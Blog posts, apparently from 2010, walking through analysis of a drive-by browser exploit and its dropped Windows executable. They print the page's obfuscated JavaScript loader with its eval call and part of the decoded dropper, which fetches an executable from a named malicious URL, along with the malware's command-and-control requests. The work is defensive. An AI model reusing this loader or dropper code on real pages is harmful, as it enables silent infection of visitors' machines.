Archive for the ‘Uncategorized’ Category

Malware Analysis Walking Tour (The Payload)

Monday, March 8th, 2010

If you’re just tuning in, this is the third post in a series. Check out the beginning of the Malware Analysis Walking Tour to see how we got here.

Also, if you’re doing this for anything other than your own edification, there are *much* faster ways to go about many of these steps. Wes Brown of IO Active recently gave an excellent talk on his malware analysis toolkit at BSides SF.

The Payload

Someone went to a lot of trouble to get this SgwAg.exe on the machine. The question is why: Spam? Porn? Advertising? Botnet?

First off, we’ll need a copy of the exe. Since none of the nasty bits of the exploit code actually ran on the linux machine, we’ll have to go fetch the exe manually. We saw the url for it in the decoded exploit code, so we can grab it easily enough:

$ wgetasie -O SgwAg.exe.INFECTED http://nevpizdy-nenyznie50domain.in/feedback.php?page=1
[]
2010-01-04 19:19:37 (63.2 KB/s) - 'SgwAg.exe.INFECTED' saved [84992/84992]
$ file SgwAg.exe.INFECTED
SgwAg.exe.INFECTED: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Here I used the file command for a quick check that I did indeed get a Windows executable back. One step that’s quick and easy is to simply dump the strings in the file. Sometimes this tells us nothing, sometimes it tells us a lot.

$ strings SgwAg.exe.INFECTED | more
[...]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
<assemblyIdentity 
    version="1.0.0.0" 
    processorArchitecture="X86" 
    name="Sandboxie" 
    type="win32" 
<description>Sandboxie</description> 
[...]

Hmmm… it is, was, contains, or is meant to look like something called “Sandboxie”. Looking at the properties on my Windows VM seems to back this up.

Well, that’s just too weird to pass up. Ordinarily at this point I’d be deciding on whether to deadlist in IDA or step through it in OllyDbg, but if some part of this malware is actually borrowed code then we stand to learn a lot by checking out what functionality is being ripped off.

I found the Sandboxie site and grabbed the release indicated by the PE version info (3.26) and install it on a VM, then take an md5 sum of Start.exe (from the official Sandboxie release), and the malware SgwAg.exe.

$ md5sum Start.exe SgwAg.exe.INFECTED
70c8e29228870ae7d5da6f457b9b395d  Start.exe
39990427da35c7625764c0e6f262a299  SgwAg.exe.INFECTED

Okay, so they’re not actually the same piece of code. No info about why the malware looks like Sandboxie, but hopefully that will become evident later. Just in case, I run both of them through the Binary Diffing Suite; there are a lot of changes, too many to list. I also put them through BinDiff in IDA to see if there’s any parts that are actually the same.

Only two functions “match” in name/parameter hueristics, but a quick glance at the graph view shows that these are red herrings. The yellow nodes with red outlines in the callgraph are ones that match no nodes in the other, supposedly similar, function. So, this malware was just supposed to look like Sandboxie Start.exe from the outside.

Since I don’t think there’s much more I can learn by staring at the surface of the file, it’s again time to make the decision: run or read? I can put the exe in a disposable environment, run it, and debug/profile it, or disassemble it and see what find. I’ve done a lot of the “running it” approach, so I look at IDA Pro to see what the code has to say. Checking what functions are imported and what functions are defined is an informative first step.

Awesome. I see socket(), bind(), and listen(), the three bad boys of becoming a server. Since I’m not much of a windows programmer, other than that nothing rings a bell and it’s time to read up on the rest of these functions and see what else this binary is equipped to do. The other problem is that while these functions are imported, they’re not actually used anywhere. That and some huge swaths of bytes that IDA didn’t recognize as instructions or data stinks of more packed or encoded/polymorphic code.

I run PEiD on the binary to see if it recognizes any common packer; nothing is identified. Oh well, it was worth a try.

[TODO – Finish writing SgwAg analysis; unpacking routine and antidebugging]

We’ve put it off long enough; it’s time to run this sucker. I copy the file over to a test VM and prepare to run it:

  • Switch the VMWare guest to HostOnly networking
  • Take a filesystem and registry snapshot using InstallWatch Pro
  • Snapshot the VM
  • Run Wireshark on the VMWare host so we can see anything that the malware attempts to connect to
  • Run a fake DNS to resolve all names to the VM Host
  • Run a fake HTTP server on the VM Host to log and respond to all requests
  • Start ProcMon and filter out activity that will flood the logs

Double click and… the file disappears. Hmm, that was anticlimactic. Did it do anything before erasing itself? I stop ProcMon and save the full logs, then filter for anything done by SgwAg.exe, and save again. The log shows that it was very busy indeed; a bit over 2000 logged actions before it exited, and several process creations.

We look through this and see that it’s doing a number of things, including reading out large chunks of itself.

ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 2,560, Length: 1,024
ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 1,024, Length: 1,536
ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 4,096, Length: 16,384
ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 20,480, Length: 16,384
[...and later...]
CreateFile	C:\WINDOWS\packycfg.dll	SUCCESS	OpenResult: Created
WriteFile	C:\WINDOWS\packycfg.dll	SUCCESS	Offset: 0, Length: 35,328
CloseFile	C:\WINDOWS\packycfg.dll	SUCCESS

Now, it could be a coincidence that the malware reads out four chunks of itself totaling 35,328 bytes, then writes out a brand new 35,328 byte file, but I’m going to go with “highly unlikely”. We’ll have to get a copy of that and analyze it as well. However, that does save us time discovering and reversing the packing scheme that was used (since PEiD didn’t recognize it). Only one other file gets written:

WriteFile	C:\binaries_for_analysis\abcdefg.bat	SUCCESS	Offset: 0, Length: 50
[… and later …]
Process Create	C:\WINDOWS\system32\cmd.exe	SUCCESS	PID: 1152, Command line: cmd /c 	""C:\binaries_for_analysis\abcdefg.bat" "C:\binaries_for_analysis\SgwAg.exe""

This is a pretty standard pattern. If a binary wants to delete itself the usual approach is to write a batch file with instructions to delete it, then terminate, and let the batch file clean up. This particular flavor looped while checking if the second argument existed, trying to delete it each time.

While I’m saving logs from ProcMon and InstallWatch I notice that the dummy DNS and HTTP servers I set up are suddenly showing lots of requests.

pyminifakeDNS:: dom.query. 60 IN A 192.168.62.1
Respuesta: in.webstat44.com. -&gt; 192.168.62.1

The Fake DNS (from http://code.activestate.com/recipes/491264/) did its job; the malware requested resolution of “in.webstat44.com” and it got the IP of the VM host. It then makes some HTTP POST and GET requests.

DummyHTTP ready.
 
Saw POST request:
Content-Type: multipart/form-data; boundary=--------------------------cd4d11cd4d11cd4d11
User-Agent: IE
Host: in.webstat44.com
Content-Length: 317
Cache-Control: no-cache 
 
PTHOMAS-MALWARE - - [11/Jan/2010 16:34:49] "POST /cgi-bin/forms.cgi HTTP/1.1" 200 -
 
Saw GET request:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; .NET4.0C; .NET4.0E)
Host: in.webstat44.com
Connection: Keep-Alive 
 
PTHOMAS-MALWARE - - [11/Jan/2010 16:34:54] "GET /cgi-bin/options.cgi?user_id=1426383534&amp;version_id=38&amp;passphrase=fkjvhsdvlksdhvlsd&amp;socks=0&amp;version=38&amp;crc=00000000 HTTP/1.1" 200 -
 
Saw GET request:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; .NET4.0C; .NET4.0E)
Host: in.webstat44.com
Connection: Keep-Alive 
 
PTHOMAS-MALWARE - - [11/Jan/2010 16:35:08] "GET /cgi-bin/options.cgi?user_id=1426383534&amp;version_id=38&amp;passphrase=fkjvhsdvlksdhvlsd&amp;socks=0&amp;version=38&amp;crc=00000000 HTTP/1.1" 200 - 
 
[...many more of this request...]

Hmm, the exe took its sweet time there; from initial run (16:10:03) to first phone home (16:34:49) was a bit over 24 minutes. Some checks online show that “in.webstat44.com” was listed on various malware domain blacklists a while ago and has since gone offline. Cool; score one for the good guys. That leaves us with just the newly written packycfg.dll to analyze.

Okay then, we have what we need. I zip up all the logs, output, and packycfg and move them off the VM, then revert it to the snapshot.


Next Up: The Real Payload

Malware Analysis Walking Tour

Tuesday, February 23rd, 2010

Part of my day job lately has been to build up a catalog of drive-by browser exploits and so I decided to put up some notes on the process. When I first started taking apart malware, the detailed examples I found online were invaluable, so I’m putting this up partly to try to give back and partly to try to make the whole process a little more accessible to the interested but not-quite-as-technical reader. Feel free to post a reply or contact me with questions or comments.

Getting Started

Sometimes finding a piece of malware to examine can be the first hurdle in doing any analysis. Here we have it pretty easy; we run a malware scanner that crawls the net with a swarm of unpatched virtual machines and monitors them to detect unusual behavior. When one of them exhibits symptoms of malware we can dump information about what happened to the machine, restore it from a snapshot, and send it back out to continue trawling.

Here we can see that the root page of nevpizdy-nenyznie50domain.in caused some suspect behavior on an unpatched XP/IE6 VM. Let’s take a look at what happened.

The static analysis came back clean. No real surprise there, since static analysis is a coarse-grained, best effort type approach; it picks up the obvious stuff, but it’s easy to fool. This exploit is going to be worth looking into, if for no other reason than it will help us refine our static analysis detections.

Runtime (aka dynamic) analysis is where we’re really going to see stuff happen. Here we see a new process being executed from some binary file that shouldn’t be there; whatever the exploit is, the words “arbitrary code execution” are going to show up in the description.

I don’t know where that file came from at this point; best guess is that it’s being downloaded from some remote site rather than written manufactured by logic on the page. We’ll see.

Time to get out of the GUI and get our hands dirty. Before I get to the code, a word of warning: don’t go visit these urls. They’ve demonstrably owned a machine already, so unless you really want to know if it happens every time you should probably keep your hands in your pockets on this one.

$ mkdir nevpizdy-nenyznie50domain.in
$ cd nevpizdy-nenyznie50domain.in/
$ touch notes
$ wgetasie http://nevpizdy-nenyznie50domain.in
$ chmod -w index.html
$ less index.html
<html><body><div style="display: none"><ul><li
id="khBsFxi">153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i61y174b61Q83Z83F83b83V166n152I167D135i156d160r152z162K168k167a91R90D159T162N150O148d167q156i162a161R97r155Z165K152Z153X83m112p83w85s148R149S162f168Z167W109O149C159N148O161N158y85p90e95B83I100s99P99m99i99y92M110z61q176l61K61P15
3J168w161F150G167p156X162Y161U83w122u162j91z148I92x61M174G61m83r83I83v83k169Y148h165T83W166u83T112N83g118d165c152p148a167i152w130P91F148U95k83C90P138U134C150Y165R156P163e167E97H134n155z152r159L159h90L92i110b61e83v83H83I83Y169x148j165G83t162y83M112O83j118O165d152D148Q167C152V130g91h148a95n83U90a116e119f130H119q1
[...]

Hmm, clearly some obfuscated exploit code, but doesn’t look like an encoding I’ve seen before. There’s a lot of that junk (full content in Appendix 1 of this pdf if you want to follow along), but what comes after is more immediately interesting (if horribly ugly):

 
<script>function zacabab (abeicd) { var terry = abeicd.split(':'); var merry = 'zxc'; return terry[2];};</script>
<script>
 var FhcL0z0 = new String(""); FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
g6VZ13w8 = document.lastModified; k0miOe5c = zacabab(g6VZ13w8); FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');
function aXzLA9jbkkRMIW ( OzNL6t,em7lqjVq ) { var AYMQGuD7 = new String();var bsL1aXtpUc = new String();
 var mXhEn59Xi = OzNL6t.split(';'); for(euWM8 = 0;euWM8 < mXhEn59Xi.length-1;euWM8++)
 { AYMQGuD7 = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')](mXhEn59Xi[euWM8] - em7lqjVq);
bsL1aXtpUc = bsL1aXtpUc + AYMQGuD7;} return bsL1aXtpUc;}var vnfjqq = Date();LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);
var mXhEn59Xi = 'AYMQGuD7';function krasddk(zxc) {eval(zxc); return;};krasddk( LCEsM );</script>

This is the decoding part of the script (or a pretty-printed version in Appendix 2 of the pdf). So, there are two ways to do this right now; one is carefully take this script apart and manually decode it piece by piece, the other way is to let it do its thing in a javascript debugger and just grab whatever it decodes from memory. The later is a lot faster.

Since this is a payload that targets Windows machines and I’m on a reduced privilege account on a linux machine, it’s reasonable to let this thing run. Just in case, I take a moment to switch Firefox to use Paros proxy so that if the script makes any requests I can record them and then drop them.

I open up Firebug on a blank page, set “Break on Next”, and then load the index.html that I pulled down with wget. When the page has finished rendering, I take a look at the DOM to see if anything jumps out at me; in this case, something does.

FhcL0z0 = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;61;174;61;83;83;83;83;166;152;167;135;156;160;152;162;168;167;91;90;159;162;150;148;167;156;162;161;97;155;165;152;153;83;112;83;85;148;149;162;168;167;109;149;159;148;161;158;85;90;95;83;100;99;99;99;99;92;110;61;176;61;61;153;168;161[…]

So FhcL0z0 is now interesting. Where did it come from?

FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');

Remember the <li> that started out with “153n168Q161h150s167…”? It turns out that strange looking “encoding” scheme was just sticking random letters between the sets of numbers. This is a case that code reading could have turned up the info just as quickly as running the script: two methods, both will usually work.

The nice thing about running it is that there’s still lots of stuff in the DOM to look at. Back to Firebug:

LCEsM =function Complete()
{
    setTimeout('location.href = \"about:blank\"', 10000);
}
function Go(a)
{
    var s = CreateO(a, 'WScript.Shell');
    var o = CreateO(a, 'ADODB.Stream');
    var e = s.Environment('Process');
    var urltofile = 'http://nevpizdy-nenyznie50domain.in/feedback.php?page=1';
    var filename = 'hgivV.exe';
    var xhr = null;
    var bin = e.Item('TEMP') + '\\' + filename;
[...]

Hey, that’s nice. There’s only one layer of obfuscation going on here; once we get through the junk in FhcL0z0, it’s pretty readable (they even left the linebreaks in, how thoughtful). This is the code that actually performs the exploit; it gets executed via a gently-obfuscated eval() call at the end of the script tag: krasddk( LCEsM );
We don’t really need to know at this point, but it might be instructive to figure out where LCEsM came from.

LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);

Long story short, LCEsM is produced by decoding FhcL0z0 using a function and a key. The function is a simple for-loop that walks the input string and executes an obfuscated call to fromCharCode. The key is from

g6VZ13w8 = document.lastModified;
k0miOe5c = zacabab(g6VZ13w8);

The zacabab() function just splits the date at the “:” and returns the final string. Firebug tells me that the last modified date of the file is “12/28/2009 14:42:51″ (and examining g6VZ13w8 and k0miOe5c confirms this); therefore the key needed to decode it is 51. A quick check verifies that we understand the encoding scheme.

$ python
>>> encoded = "153;168;161;150;167;156;162;161"
>>> "".join([chr(int(c) - 51) for c in encoded.split(";")])
'function'

As an aside, this is a perfect example of why DRM is ultimately a losing battle; if you provide someone with the ciphertext, the scrambling method, and the key, then you have provided them with everything they need to compromise your system. It works the same no matter if you’re a blackhat or a movie studio.

Back to the analysis, a quick bravo is called for for the folks behind wget. It correctly preserved the Last Modified date while saving the page to the filesystem; without that, there would be been a lot more trial and error to figuring out the key. Thanks Hrvoje Niksic and Micah Cowan!

$ stat index.html
[...]
Modify: 2009-12-28 14:42:51.000000000 -0800

It seems that the detour to figure out how LCEsM was encoded was time well spent. We learned about an interesting obfuscation scheme (using lastModified) and learned that wget easily mitigates it. We can add this sort of information to static detections to correlate different exploits encoded by the same toolkit and do trending on related malware.

Next Time: The Exploit